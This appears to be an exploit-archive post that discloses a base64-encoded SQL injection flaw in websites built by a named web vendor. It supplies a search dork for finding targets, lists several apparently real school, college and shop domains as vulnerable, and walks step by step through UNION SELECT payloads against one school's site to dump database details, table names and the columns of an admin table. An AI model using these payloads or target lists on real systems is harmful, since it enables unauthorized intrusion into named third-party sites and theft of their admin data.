Engineered by Enigmaa Technologies group BASE64 Sql injection Vulnerability

2019.04.08

Dj3Bb4rAn0n_Dz (NL)

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

Dork: Engineered by : Enigmaa Tech Group | Powered by Enigmaa Technologies | Designed by Sphinx Technology

===================================================================================================
# Ttitle : Engineered by Enigmaa Technologies group BASE64 Sql injection Vulnerability
# Author : Dj3Bb4rAn0n (bassem) FB/djebbar.bassem.16
# Date : /05/04/2019/
# Home : Annaba ( algeria )
# Tested on : Linux ( backbox )
# Vendor : Enigmaa Technologies group
# Dorks : Engineered by : Enigmaa Tech Group | Powered by Enigmaa Technologies | Designed by Sphinx Technology
===================================================================================================
PoC :
Admin panel path : site.com/admin/login/
-----------------------
[ + ] Search in google using dorks above
[ + ] Payload [ ' ]
[ + ] Choose your target and look for injection point [ Encoded with base64 ] Ex: www.bhbcollege.ac.in/fac.php?id=MTU= <====== Inject here
#######################
Example of vulnerable sites :
######################
[ + ] www.bhbcollege.ac.in/fac.php?id=MTU=
[ + ] www.bookmypuja.in/book.php?id=MzU=
[ + ] iconacademy.org/view.php?id=25
[ + ] www.krdcollege.in/view.php?id=23
[ + ] hdiedupublishers.com/product.php?id=63
############
Demo
############
# www.navjyotiroyalheritageschool.in/read.php?id=NTA=
# www.navjyotiroyalheritageschool.in/read.php?id=[BASE64]=50']
# www.navjyotiroyalheritageschool.in/read.php?id=[BASE64]=50']
# www.navjyotiroyalheritageschool.in/read.php?id=[BASE64]=50' -- -] Fixable : ' -- -
Columns number is 12 :
-----------------------------
# www.navjyotiroyalheritageschool.in/read.php?id=[BASE64]=50' order by 12 -- -]
Vulnerable columns is : 3 | 4 | 6 | 11 | 12 |
-----------------------------------------------------
# www.navjyotiroyalheritageschool.in/read.php?id=[BASE64]=-50' Union Select 1,2,3,4,5,6,7,8,9,10,11,12 -- -]
Database | Version | user | Hostamne :
------------------------------------------------
# www.navjyotiroyalheritageschool.in/read.php?id=[BASE64]=-50' Union Select 1,2,concat(database(),0x3c62723e,@@version,0x3c62723e,user(),0x3c62723e,@@Hostname),4,5,6,7,8,9,10,11,12 -- -]
Tables : [ Encoded with base64]
----------
# www.navjyotiroyalheritageschool.in/read.php?id=LTUwJyAgVW5pb24gU2VsZWN0IDEsMixncm91cF9jb25jYXQoMHgzYzYyNzIzZSx0YWJsZV9uYW1lKSw0LDUsNiw3LDgsOSwxMCwxMSwxMiBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS50YWJsZXMgd2hlcmUgdGFibGVfc2NoZW1hPSJta2NvbGN4Zl9uYXYiICAtLSAt
columns : [ Encoded with base64]
------------
# http://www.navjyotiroyalheritageschool.in /read.php?id=LTUwJyAgVW5pb24gU2VsZWN0IDEsMixncm91cF9jb25jYXQoMHgzYzYyNzIzZSxjb2x1bW5fbmFtZSksNCw1LDYsNyw4LDksMTAsMTEsMTIgZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEuY29sdW1ucyB3aGVyZSB0YWJsZV9uYW1lPSJhZG1pbiIgIC0tIC0=
########
Greetz to : Lakarha_23 | mohammed pazzo | Ja gar
#######

See this note in RAW Version

Vote for this issue:

100%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Engineered by Enigmaa Technologies group BASE64 Sql injection Vulnerability

Dork: Engineered by : Enigmaa Tech Group | Powered by Enigmaa Technologies | Designed by Sphinx Technology

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.